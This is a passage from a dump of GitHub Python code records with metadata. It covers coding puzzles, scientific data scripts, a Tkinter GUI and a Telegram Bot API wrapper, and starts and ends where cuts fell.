__init__(self):\n self.headval = Node(0)\n self.currNode = self.headval\n\n# Function to add node\n def add(self,newdata):\n\n NewNode = Node(newdata)\n node = self.currNode.prevval\n \n node.nextval.prevval = NewNode\n NewNode.nextval = node.nextval\n NewNode.prevval = node\n node.nextval = NewNode\n \n self.currNode = NewNode\n \n def forward(self, steps):\n for x in range(steps):\n self.currNode = self.currNode.nextval\n\n def backward(self, steps):\n for x in range(steps):\n self.currNode = self.currNode.prevval\n\n def removeCurrent(self):\n value = self.currNode.dataval\n\n self.currNode.prevval.nextval = self.currNode.nextval\n self.currNode.nextval.prevval = self.currNode.prevval\n self.currNode = self.currNode.nextval\n \n return value\n \n# Print the linked list\n def listprint(self):\n val = str(self.headval.dataval)+\", \"\n start = self.headval\n printval = self.headval.nextval\n first = True\n while printval is not start:\n val += str(printval.dataval)+\", \"\n printval = printval.nextval\n return val\n \n#puzzle input: 430 players; last marble is worth 71588 points\ndemoInput = False\n\nif demoInput:\n players = 13\n marbles = 7999\nelse:\n players = 430\n marbles = 7158800\n\ncurrentMarble = 0\nboard = LinkedList()\nnewMarblePos = 2\nscoringMarble = 23\n\nscores = {}\n\nfor marble in range(1, marbles+1):\n player = ((marble-1)%players)+1\n\n if marble % 100000 == 0:\n print (\"Current marble:\",marble)\n if marble > 1 and marble % scoringMarble == 0:\n turnScore = marble + scores.setdefault(player, 0)\n board.backward(7)\n removedMarble = board.removeCurrent()\n scores[player] = turnScore + removedMarble\n #print (\"*[\",player,\"]\",board.listprint(), \"; scored\",scores[player])\n continue\n\n board.forward(2)\n board.add(marble)\n #print (\"[\",player,\"]\",board.listprint())\n\ntally = sorted([x for x in scores.items()], key=lambda a : a[1], reverse=True)\nprint(tally[0])\n","repo_name":"zac112/adventOfCode","sub_path":"code2018/py3/day9/day9_2.py","file_name":"day9_2.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"36136945487","text":"primary_1pair = int(input())\nprimary_2pair = int(input())\ndiff1 = int(input())\ndiff2 = int(input())\n\nfor a in range(primary_1pair, primary_1pair + diff1 + 1):\n for b in range(primary_2pair, primary_2pair + diff2 + 1):\n first_is_prime = True\n second_is_prime = True\n for c in range(2, a):\n if a % c == 0:\n first_is_prime = False\n break\n for d in range(2, b):\n if b % d == 0:\n second_is_prime = False\n break\n if first_is_prime and second_is_prime:\n print(f\"{a}{b}\")\n","repo_name":"yordanraychev/software-university-python","sub_path":"01_programming_basics_with_python/06_nested_loops_more_exercises/13_prime_pairs.py","file_name":"13_prime_pairs.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27685807572","text":"# https://www.hackerrank.com/challenges/ctci-ransom-note\n\ndef ransom_note(magazine, ransom):\n noteDict = dict()\n for word in magazine:\n if word in noteDict.keys():\n noteDict[word] += 1\n else:\n noteDict[word] = 1\n for word in ransom:\n if not(word in noteDict.keys()):\n return False\n else:\n noteDict[word] -= 1\n if noteDict[word] < 0:\n return False\n return True\n\nm, n = map(int, input().strip().split(' '))\nmagazine = input().strip().split(' ')\nransom = input().strip().split(' ')\nif m < n:\n print(\"No\")\nelse:\n answer = ransom_note(magazine, ransom)\n if(answer):\n print(\"Yes\")\n else:\n print(\"No\")\n \n","repo_name":"Tsunamicom/Hackerrank-Solutions","sub_path":"HashTablesRansomNote.py","file_name":"HashTablesRansomNote.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36642794608","text":"\nimport argparse\nfrom wgsa_add.utils import *\nfrom wgsa_add.base import load_json\nfrom os import path as ospath\n\ncol_names = [\"genes\",\n \"assay\",\n \"enhancer\",\n \"GO_molecular_function_complete_list_id\",\n \"GO_biological_process_complete_list_id\",\n \"GO_cellular_component_complete_list_id\",\n \"PANTHER_GO_SLIM_molecular_function_list_id\",\n \"PANTHER_GO_SLIM_biological_process_list_id\",\n \"PANTHER_GO_SLIM_cellular_component_list_id\",\n \"REACTOME_pathway_list_id\",\n \"PANTHER_pathway_list_id\"]\n\n\ndef main():\n parser = parse_arguments()\n enhancer_dir = parser.enhancer_dir\n vcf_path = parser.vcf_path\n\n annotation_file = ospath.splitext(ospath.basename(vcf_path))[0]\n annotation = load_json(ospath.join(enhancer_dir, annotation_file+'.json'))\n\n add_annotation(vcf_path, annotation)\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--enhancer_dir', dest='enhancer_dir', required=True,\n help='Panther Dir (panther_data, cor_data and annoq_tree)')\n parser.add_argument('-f', '--vcf_path', dest='vcf_path', required=True,\n help='VCF file')\n\n return parser.parse_args()\n\n\ndef in_region(pos, start, end):\n return pos >= start and pos <= end\n\n\ndef combine_interval_data_into_r(annotations, coor, col_names):\n chrom, pos = coor[0], coor[1]\n panther_annotations = [annotation for annotation in annotations if \n in_region(pos, annotation['start'], annotation['end'])]\n result = {}\n for annotation in panther_annotations:\n for col_name in annotation['data']:\n result[col_name] = result.get(col_name, set()).union(annotation['data'][col_name])\n for col_name in col_names:\n if not result.get(col_name):\n result[col_name] = '.'\n\n return [';'.join(result[col_name]) for col_name in col_names]\n\n\ndef add_annotation_header():\n add_cols = ['enhancer_linked_' + i for i in col_names]\n\n return add_cols\n\n\ndef add_annotation_row(row, annotations):\n line = row.rstrip().split(\"\\t\")\n chrom, pos = line[0], int(line[1])\n coor = [chrom, pos]\n add_cols = combine_interval_data_into_r(\n annotations, coor, col_names)\n\n return add_cols\n\n\ndef add_annotation(filepath, annotations):\n\n with open(filepath) as fp:\n row = fp.readline().rstrip()\n add_cols = add_annotation_header()\n print(add_record(row, add_cols))\n\n # add info\n while row:\n row = fp.readline().rstrip()\n if row:\n add_cols = add_annotation_row(row, annotations)\n print(add_record(row, add_cols))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"USCbiostats/annoq-data-builder","sub_path":"wgsa_add/add_enhancer_anno.py","file_name":"add_enhancer_anno.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42584520410","text":"import os\nimport numpy as np\n\n# RandomLayers package\nfrom RandomLayers.random_fields import RandomFields\nfrom RandomLayers.methods import ModelName\nfrom RandomLayers.mesh import LayersMesh\nfrom RandomLayers.utils import slice, split_data\n\n\n\ndef generate_data(x_max, y_max, z_max, nb_max_layers, min_layer_thickness,\n planes_dict, soils_dict, output_folder, nb_realisations, min_value=1):\n\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n\n for n in range(nb_realisations):\n try:\n print(f\"Number of realisation: {n}\")\n np.random.seed(n)\n\n nb_layers = np.random.randint(1, nb_max_layers + 1)\n idx_to_use_soil = np.random.choice(range(nb_layers), nb_layers, replace=False)\n # print(f\"Number of layers: {nb_layers}\")\n\n z_middle = []\n z_low = 0\n for i in range(nb_layers - 1):\n new_z = np.round(np.random.uniform(z_low, z_max), 1)\n if new_z == z_max:\n break\n z_middle.append(new_z)\n z_low = z_middle[i] + min_layer_thickness\n if z_low >= z_max:\n break\n\n nb_layers = int(len(z_middle) + 1)\n idx_to_use_soil = idx_to_use_soil[:nb_layers]\n # print(f\"Number of layers: {nb_layers}\")\n\n planes = []\n plane_cov = []\n theta = []\n aniso = []\n angles = []\n planes.append(np.array([[0, 0, 0],\n [x_max, 0, 0],\n [x_max, y_max, 0],\n [0, y_max, 0],\n ])\n )\n plane_cov.append([0, 0, 0])\n\n for z in z_middle:\n planes.append(np.array([[0, 0, z],\n [x_max, 0, z],\n [x_max, y_max, z],\n [0, y_max, z],\n ])\n )\n _cov = np.round(np.random.uniform(0, planes_dict[\"max_cov\"]), 3)\n _theta = np.round(np.random.uniform(0, planes_dict[\"max_theta\"]), 3)\n plane_cov.append([0, 0, _cov])\n theta.append([_theta, _theta, _theta])\n aniso.append([1, 1, 1])\n angles.append([0, 0, 0])\n\n\n planes.append(np.array([[0, 0, z_max],\n [x_max, 0, z_max],\n [x_max, y_max, z_max],\n [0, y_max, z_max],\n ])\n )\n plane_cov.append([0, 0, 0])\n theta.append([1, 1, 1])\n aniso.append([1, 1, 1])\n angles.append([0, 0, 0])\n\n resample_points_x = 51\n resample_points_y = 6\n resample_points_z = 21\n\n layers = LayersMesh(planes, plane_cov,\n model=ModelName.Gaussian, theta=theta, anisotropy=aniso, angles=angles, resample_points=51, seed=n)\n\n x = np.linspace(0, x_max, resample_points_x)\n y = np.linspace(0, y_max, resample_points_y)\n z = np.linspace(0, z_max, resample_points_z)\n X, Y, Z = np.meshgrid(x, y, z, indexing=\"ij\")\n\n layers.generate_mesh(np.array([X.ravel(), Y.ravel(), Z.ravel()]).T)\n\n theta = []\n aniso = []\n angles = []\n for i in range(nb_layers):\n theta.append([np.round(np.random.uniform(min_value, soils_dict[\"max_theta\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_theta\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_theta\"][idx_to_use_soil[i]]), 2),\n ])\n aniso.append([np.round(np.random.uniform(min_value, soils_dict[\"max_aniso\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_aniso\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(min_value, soils_dict[\"max_aniso\"][idx_to_use_soil[i]]), 2)\n ])\n angles.append([np.round(np.random.uniform(-soils_dict[\"max_angle\"][idx_to_use_soil[i]], soils_dict[\"max_angle\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(-soils_dict[\"max_angle\"][idx_to_use_soil[i]], soils_dict[\"max_angle\"][idx_to_use_soil[i]]), 2),\n np.round(np.random.uniform(-soils_dict[\"max_angle\"][idx_to_use_soil[i]], soils_dict[\"max_angle\"][idx_to_use_soil[i]]), 2),\n ])\n\n rf = RandomFields(ModelName.Gaussian, layers.mesh.polygons_points, theta, aniso, angles, seed=n)\n rf.generate(np.array(soils_dict[\"soil_properties\"])[idx_to_use_soil], np.array(soils_dict[\"soil_var\"])[idx_to_use_soil])\n\n # plot3D(layers.mesh.polygons_points, rf.random_field, output_folder=\"./\", output_name=\"RF.png\")\n # plot3D_viewer(layers.mesh.polygons_points, rf.random_field, output_folder=\"./\", output_name=\"RF.html\")\n coord, sliced_rf = slice(layers.mesh.polygons_points, rf.random_field, 1, 0)\n\n with open(os.path.join(output_folder, f\"./slice_{str(n).zfill(3)}.txt\"), \"w\") as f:\n f.write(\"x;y;z;IC\\n\")\n for i in range(len(coord)):\n f.write(f\"{coord[i][0]};{coord[i][1]};{sliced_rf[i]}\\n\")\n\n # make plot\n import matplotlib.pylab as plt\n fig, ax = plt.subplots(1,1, figsize=(6, 4))\n ax.set_position([0.1, 0.1, 0.7, 0.8])\n im = ax.imshow(sliced_rf.reshape((resample_points_x, resample_points_z)),\n vmin=1., vmax=4., cmap=\"viridis\", extent=[0, x_max, 0, z_max])#, aspect=\"auto\")\n cax = fig.add_axes([0.85, 0.45, 0.02, 0.1])\n cbar = fig.colorbar(im, cax=cax, fraction=0.046, pad=0.04)\n cbar.set_label(\"value\")\n plt.savefig(os.path.join(output_folder, f\"slice_{str(n).zfill(3)}.png\"))\n plt.close()\n except:\n print(f\"Error in {n}\")\n continue\n\n\nif __name__ == '__main__':\n\n planes = {\"max_cov\": 0.1,\n \"max_theta\": 10,\n }\n soils = {\"max_theta\": [10, 5, 10, 5, 10],\n \"max_aniso\": [10, 5, 10, 5, 10],\n \"max_angle\": [np.pi/6, np.pi/6, np.pi/6, np.pi/6, np.pi/6],\n \"soil_properties\": [3, 2, 1.5, 4, 2.5],\n \"soil_var\": [0.3, 0.2, 0.15, 0.4, 0.25],\n }\n\n x_max = 100\n y_max = 5\n z_max = 10\n nb_max_layer = 5\n\n min_layer_thickness = 0.1\n output_folder = \"./output\"\n generate_data(x_max, y_max, z_max, nb_max_layer, min_layer_thickness,\n planes, soils, output_folder, 10)\n\n split_data(output_folder, os.path.join(output_folder, \"train\"), os.path.join(output_folder, \"./validation\"),\n train_size=0.8)\n","repo_name":"brunozc/RandomLayers","sub_path":"generator_RF.py","file_name":"generator_RF.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21401327359","text":"#!/usr/bin/env python3\nimport collections\nimport functools\nimport json\nimport logging\nimport pathlib\nfrom typing import Union\n\nimport cv2\nimport fire\nimport numpy as np\nfrom blenderset.utils.log import configure_logging\nfrom skimage import util\nfrom vi3o import debugview\nfrom vi3o.image import imread\n\nfrom blenderset.utils.lens import create_lens_from_json\n\nlogger = logging.getLogger(__name__)\n\n\nclass DebugViewer(debugview.DebugViewer):\n def __init__(self, paths, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._paths = collections.deque(paths)\n self._view = \"rgb\"\n self._render()\n\n def _render(self):\n path = self._paths[0]\n logger.info(\"Showing %s for %s\", self._view, path)\n if self._view == \"rgb\":\n self.view(_read_rgb_with_overlay(path), pause=True)\n elif self._view == \"seg\":\n self.view(_read_seg(path), pause=True)\n elif self._view == \"hmask\":\n self.view(_read_hmask(path), pause=True)\n else:\n assert False\n\n def on_key_press(self, key, modifiers):\n if key == debugview.keysym.N:\n self._paths.rotate(-1)\n elif key == debugview.keysym.P:\n self._paths.rotate(1)\n elif key == debugview.keysym.R:\n self._view = \"rgb\"\n elif key == debugview.keysym.S:\n self._view = \"seg\"\n elif key == debugview.keysym.H:\n self._view = \"hmask\"\n else:\n super().on_key_press(key, modifiers)\n self._render()\n\n\n@functools.lru_cache(maxsize=2)\ndef _read_seg(path: pathlib.Path):\n return util.img_as_ubyte(np.load(path / \"segmentations.npy\"))\n\n\n@functools.lru_cache(maxsize=2)\ndef _read_hmask(path: pathlib.Path):\n return imread(path / \"head_mask.png\")\n\n\n@functools.lru_cache(maxsize=2)\ndef _read_rgb_with_overlay(path: pathlib.Path):\n img = imread(path / \"rgb.png\")\n objects = json.load(open(path / \"objects.json\"))\n\n lens = create_lens_from_json(img.shape, path / \"lens.json\")\n camera_matrix = np.load(path / \"camera_matrix.npy\")\n\n for obj in objects.values():\n for key in [\"bounding_box_tighter\", \"bounding_box_tight\"]:\n if key in obj:\n bbox = obj[key]\n break\n else:\n assert False\n u0, u1, v0, v1 = bbox\n if obj[\"class\"] == \"human\":\n cv2.rectangle(img, (u0, v0), (u1, v1), (255, 0, 0), 1)\n try:\n u2, u3, v2, v3 = obj[\"bounding_box_head\"]\n cv2.rectangle(img, (u2, v2), (u3, v3), (0, 255, 255), 1)\n except KeyError:\n pass\n elif obj[\"class\"] == \"construction_hat\":\n cv2.rectangle(img, (u0, v0), (u1, v1), (255, 255, 51), 1)\n elif obj[\"class\"] == \"vehicle\":\n cv2.rectangle(img, (u0, v0), (u1, v1), (0, 255, 0), 1)\n else:\n cv2.rectangle(img, (u0, v0), (u1, v1), (0, 0, 255), 1)\n\n if \"head_center_img\" in obj[\"keypoints\"]:\n u0, v0 = obj[\"keypoints\"][\"head_center_img\"]\n u1, v1 = obj[\"keypoints\"][\"left_foot_img\"]\n u2, v2 = obj[\"keypoints\"][\"right_foot_img\"]\n u = (u0 + u1 / 2 + u2 / 2) / 2\n v = (v0 + v1 / 2 + v2 / 2) / 2\n cv2.line(img, (int(u), int(v)), (int(u0), int(v0)), (0, 255, 0), 1)\n cv2.line(img, (int(u), int(v)), (int(u1), int(v1)), (0, 255, 0), 1)\n cv2.line(img, (int(u), int(v)), (int(u2), int(v2)), (0, 255, 0), 1)\n\n for n in [\"head_center\", \"left_foot\", \"right_foot\"]:\n x, y, z = obj[\"keypoints\"][n]\n x, y, z, _ = camera_matrix @ (x, y, z, 1)\n u, v = lens.world_to_image([x, y, z])[0]\n cv2.circle(img, (int(u), int(v)), 4, (0, 0, 255), 1)\n return img\n\n\ndef show_many(*paths: Union[str, pathlib.Path]):\n DebugViewer([pathlib.Path(path) for path in paths])\n\n\nif __name__ == \"__main__\":\n configure_logging()\n fire.Fire(show_many)\n","repo_name":"AxisCommunications/blenderset-addon","sub_path":"show_render.py","file_name":"show_render.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"24161105952","text":"class Solution:\n def partitionLabels(self, S: str):\n start=0\n end=len(S)-1\n res=[]\n cur=0\n cache={}#存储每个字符在列表中的最右位置\n max_len=0\n while curmax_len:\n res.append(max_len-start+1)\n start=cur\n max_len=cur\n while S[cur] not in cache and end>=max(max_len,cur):\n if S[end] not in cache:\n cache[S[end]]=end\n end-=1\n if S[cur] in cache:\n max_len=max(max_len,cache[S[cur]])\n cur+=1\n res.append(len(S)-start)\n return res\nS=\"ababcbacadefegdehijhklij\"\nprint(Solution().partitionLabels(S))","repo_name":"LChanger/LeetCode","sub_path":"LeetCode/LeetCode763.py","file_name":"LeetCode763.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4797377675","text":"import cjson\n\nTABA_EVENT_IDX_NAME = 0\nTABA_EVENT_IDX_TYPE = 1\nTABA_EVENT_IDX_VALUE = 2\nTABA_EVENT_IDX_TIME = 3\n\nclass TabaEvent(object):\n \"\"\"Simple contained for Taba Events\"\"\"\n def __init__(self, name, type, value, timestamp):\n self.name = name\n self.type = type\n self.value = value\n self.timestamp = timestamp\n\ndef SerializeEvent(event):\n \"\"\"Convert a Taba Event object into a representation that can be serialized\n\n Args:\n event - A TabaEvent object.\n\n Returns:\n A tuple of (name, type, val, timestamp) for the Event.\n \"\"\"\n return (event.name, event.type, cjson.encode(event.value), event.timestamp)\n\ndef DeserializeEvent(val):\n \"\"\"Convert the output of SerializeEvent() back into a TabaEvent object.\n\n Args:\n val - A tuple of (name, type, val, timestamp) for an Event.\n\n Returns:\n A corresponding TabaEvent object.\n \"\"\"\n return TabaEvent(val[0], val[1], cjson.decode(val[2]), val[3])\n\n","repo_name":"pragnesh/taba","sub_path":"py/tellapart/taba/taba_event.py","file_name":"taba_event.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"34173969105","text":"from Tkinter import *\n#from Tkinter.ttk import *\n#root = Tk()\n#text = Label(root, text = \"Tk's job!!\",\n#\t\t\twidth =\"80\", height=\"50\",\n#\t\t\tbg = \"black\", fg = \"white\")\n\n#text.pack()\n#root.mainloop()\n\nclass EncryptGUI(Frame):\n\tdef __init__(self, master=None):\n\t\tFrame.__init__(self, master)\n\t\tself.grid()\n\t\tself.createWidgets()\n\n\tdef createWidgets(self):\n\t\tself.it=Label(self)\n\t\tself.it[\"text\"] = \"Input: \"\n\t\tself.it.grid(row=0, column=0)\n\t\tself.ifd = Entry(self)\n\t\tself.ifd[\"width\"]=60\n\t\tself.ifd.grid(row=0, column=1, columnspan=6)\n\n\t\tself.ot=Label(self)\n\t\tself.ot[\"text\"] = \"Output: \"\n\t\tself.ot.grid(row=1, column=0)\n\t\tself.ofd = Entry(self)\n\t\tself.ofd[\"width\"]=60\n\t\tself.ofd.grid(row=1, column=1, columnspan=6)\n\n\t\tself.nb = Button(self)\n\t\tself.nb[\"text\"] = \"New\"\n\t\tself.nb.grid(row=2, column=0)\n\t\tself.nb[\"command\"]=self.nm\n\n\t\tself.lb = Button(self)\n\t\tself.lb[\"text\"] =\"Load\"\n\t\tself.lb.grid(row=2, column=1)\n\t\tself.lb[\"command\"]=self.lm\n\n\t\tself.sb = Button(self)\n\t\tself.sb[\"text\"] = \"Save\"\n\t\tself.sb.grid(row=2, column=2)\n\t\tself.sb[\"command\"]=self.sm\n\n\t\tself.eb = Button(self)\n\t\tself.eb[\"text\"] = \"Encode\"\n\t\tself.eb.grid(row=2, column=3)\n\t\tself.eb[\"command\"]=self.em\n\n\t\tself.db = Button(self)\n\t\tself.db[\"text\"]= \"Decode\"\n\t\tself.db.grid(row=2, column=4)\n\t\tself.db[\"command\"]=self.dm\n\n\t\tself.cb = Button(self)\n\t\tself.cb[\"text\"]=\"Clear\"\n\t\tself.cb.grid(row=2, column=5)\n\t\tself.cb[\"command\"]=self.cm\n\n\t\tself.cb2 = Button(self)\n\t\tself.cb2[\"text\"]=\"Copy\"\n\t\tself.cb2.grid(row=2, column=6)\n\t\tself.cb2[\"command\"]=self.cm2\n\n\t\tself.dt=Label(self)\n\t\tm=\"something happend\"\n\t\tself.dt[\"text\"]=m\n\t\tself.dt.grid(row=3, column=0, columnspan=7)\n\n\tdef nm(self):\n\t\ta=int(self.ifd.get())+int(self.ofd.get())\n\t\tself.dt[\"text\"]=a\n\n\tdef lm(self):\n\t\tself.dt[\"text\"]=\"Load Button\"\n\n\tdef sm(self):\n\t\tself.dt[\"text\"]=\"Save Button\"\n\n\tdef em(self):\n\t\tself.dt[\"text\"]=\"Encode Button\"\n\n\tdef dm(self):\n\t\tself.dt[\"text\"]=\"Decode Button\"\n\n\tdef cm(self):\n\t\tself.dt[\"text\"]=\"Clear Button\"\n\n\tdef cm2(self):\n\t\tself.dt[\"text\"]=\"Copy Button\"\n\nif __name__ == \"__main__\":\n\troot = Tk()\n\tapp = EncryptGUI(master=root)\n\tapp.mainloop()","repo_name":"qu6d83fu/Python","sub_path":"test/tk.py","file_name":"tk.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39263325431","text":"import io\nimport sys\nimport csv\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding='utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding='utf-8')\n\ncities = []\nwith open(\"./cities.csv\", encoding=\"utf-8\") as f:\n csv_reader = csv.reader(f, delimiter=',')\n for row in csv_reader:\n cities.append(row[1])\n\n\ncities = [x.strip() for x in cities]\n\nresult = []\n\nprint (\"started\", flush=True)\ni = 0\n\ncities = list(set(cities))\ncities.sort()\n\nwith open(\"cities_list.txt\", \"a\", encoding=\"utf-8\") as f:\n for city in cities:\n\n print(city + \" is valid \\n\", flush=True)\n f.write(city + \"\\n\")\n\n\n\n\n\n","repo_name":"Jadro007/EventParser","sub_path":"data/parse_cities_to_list.py","file_name":"parse_cities_to_list.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35696780793","text":"\"\"\"\nExample of point NSRP modelling based on the Brize Norton hourly gauge record.\n\nScript version of nsrp_example.ipynb notebook.\n\n\"\"\"\nimport rwgen\n\n# Boilerplate line needed to use multiprocessing in fitting on Windows OS\nif __name__ == '__main__':\n\n # Initialise model\n rainfall_model = rwgen.RainfallModel(\n spatial_model=False,\n project_name='brize_norton',\n input_timeseries='./input/brize_norton.csv',\n statistic_definitions='./input/statistic_definitions.csv',\n intensity_distribution='weibull',\n )\n\n # Calculate observed/reference statistics from gauge time series file\n rainfall_model.preprocess()\n\n # Fit model and save parameters to file\n rainfall_model.fit(\n n_workers=8, # e.g. for computer with 8 cores or logical processors\n pdry_iterations=0,\n )\n\n # Simulate three realisations of 1000 years with a 1hr timestep\n rainfall_model.simulate(\n simulation_length=1000,\n n_realisations=3,\n timestep_length=1\n )\n\n # Postprocessing\n rainfall_model.postprocess(\n amax_durations=[1, 6, 24], # durations in hours\n ddf_return_periods=[20, 50, 100], # return periods in years\n )\n \n # Plotting annual cycles (in browser)\n rainfall_model.plot()\n","repo_name":"davidpritchard1/rwgen","sub_path":"examples/rainfall_model/single_site/nsrp_example.py","file_name":"nsrp_example.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34687003322","text":"import requests\nfrom urllib.parse import urlencode\nimport json\n\n\nclass TelegramBotApi(object):\n \"\"\"docstring for .\"\"\"\n\n api_url = 'https://api.telegram.org/bot'\n\n def __init__(self, token):\n self.token = token\n\n def get_updates(self, params: dict = None) -> dict:\n params = urlencode(params) or ''\n res = requests.get(f'{self.api_url}{self.token}/getUpdates?{params}', timeout=10)\n return res.json()\n\n def send_message(self, chat_id: int, message: str, params: dict = None) -> dict:\n if not message:\n return\n params = params or {}\n params.update({'chat_id': chat_id, 'text': message, 'parse_mode': 'Markdown'})\n res = requests.post(f'{self.api_url}{self.token}/sendMessage', data=params, timeout=10)\n return res.json()\n\n def edit_message(self, chat_id: int, message: str, params: dict = None) -> dict:\n if not message:\n return\n params = params or {}\n params.update({'chat_id': chat_id, 'text': message, 'parse_mode': 'Markdown'})\n res = requests.post(f'{self.api_url}{self.token}/editMessageText', data=params, timeout=10)\n return res.json()\n\n def get_chat(self, chat_id: int) -> dict:\n params = {'chat_id': chat_id}\n res = requests.post(f'{self.api_url}{self.token}/getChat', data=params, timeout=10)\n return res.json()\n\n def send_photo(self, chat_id: int, url: str, params: dict = None) -> dict:\n params = params or {}\n params.update({\n 'photo': url,\n 'chat_id': chat_id,\n 'caption': params.get('caption', ''),\n 'parse_mode': 'Markdown'\n })\n res = requests.post(f'{self.api_url}{self.token}/sendPhoto', data=params, timeout=10)\n return res.json()\n\n def answer_callback_query(self, callback_query_id, message: str, params: dict = None):\n if not message:\n return\n params = params or {}\n params.update({'callback_query_id': callback_query_id, 'text': message})\n res = requests.post(f'{self.api_url}{self.token}/answerCallbackQuery', data=params, timeout=10)\n return res.json()\n\n def sendMediaGroup(self, chat_id: int, media: list = [], params: dict = None):\n params = params or {}\n params.update({'media': json.dumps(media), 'chat_id': chat_id})\n res = requests.post(f'{self.api_url}{self.token}/sendMediaGroup', data=params, timeout=30)\n return res.json()\n","repo_name":"lundgrenalex/towngamerbot","sub_path":"src/drivers/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"8767621304","text":"import sqlite3 #sqLite için yapılmış kütüphane. SABİTTİR.\r\n\r\ndef listele(): #Listele fonksiyonunu oluşturduk.\r\n baglanti = sqlite3.connect(\"chinook.db\") #sqlite'taki chinook veritabanına bağlandık.\r\n cursor = baglanti.execute(\"select FirstName,LastName from customers\") #ilgili bağlantıyı çalıştır.\r\n # sutun[1] ,sutun[2]\r\n for sutun in cursor:\r\n print(sutun[0], sutun[1])\r\n# FisrtName,LastName\r\n baglanti.close()\r\n\r\nlistele()","repo_name":"oguzhannw/Canl---6-Saatlik-PYTHON-Programlama-Kamp-Dersleri","sub_path":"sqliteDemo.py","file_name":"sqliteDemo.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21467248445","text":"def main():\n for counter1 in range(1000, 2001, 5):\n # Values / Process\n counter1 = counter1\n counter2 = counter1 + 1\n counter3 = counter2 + 1\n counter4 = counter3 + 1\n counter5 = counter4 + 1\n\n print(counter1, end=\" \")\n\n if counter1 < 2000:\n print(counter2, end=\" \")\n print(counter3, end=\" \")\n print(counter4, end=\" \")\n print(counter5, end=\" \")\n print(\"\")\n if counter1 == 2000:\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ICS3U-Programming-Jedidiah-B/Unit4-07-Python","sub_path":"Five_int.py","file_name":"Five_int.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3824974912","text":"#!/usr/bin/env python\n\nimport sys\nfrom os.path import join, dirname\nfrom setuptools import setup\n\nsys.path.append(join(dirname(__file__), 'src'))\n\nexecfile(join(dirname(__file__), 'src', 'BrowserMobProxyLibrary', 'version.py'))\n\nDESCRIPTION = \"\"\"\nBrowserMobProxyLibrary is a Robot Framework library ro interface with BrowserMob Proxy.\nBrowserMob Proxy is a simple utility to capture performance data for web apps (via the HAR format),\nas well as manipulate browser behavior and traffic, such as whitelisting and blacklisting content,\nsimulating network traffic and latency, and rewriting HTTP requests and responses.\n\"\"\"\n\nsetup(name = 'robotframework-browsermobproxylibrary',\n version = VERSION,\n description = 'BrowserMob Proxy library for Robot Framework',\n long_description = DESCRIPTION,\n author = 'Marcin Mierzejewski',\n author_email = '',\n url = 'https://github.com/s4int/robotframework-BrowserMobProxyLibrary',\n license = 'Apache License 2.0',\n keywords = 'robotframework testing selenium selenium2 webdriver web browsermob proxy',\n platforms = 'any',\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Testing\"\n ],\n install_requires = [\n 'robotframework >= 2.6.0',\n 'browsermob-proxy >= 0.7.1',\n ],\n package_dir = {'': 'src'},\n packages = ['BrowserMobProxyLibrary'],\n )\n","repo_name":"badjiyoon/seleniumtest","sub_path":"robotframework-BrowserMobProxy/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32539519791","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import svm, neighbors, linear_model, naive_bayes\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error, r2_score, accuracy_score\nfrom sklearn.preprocessing import 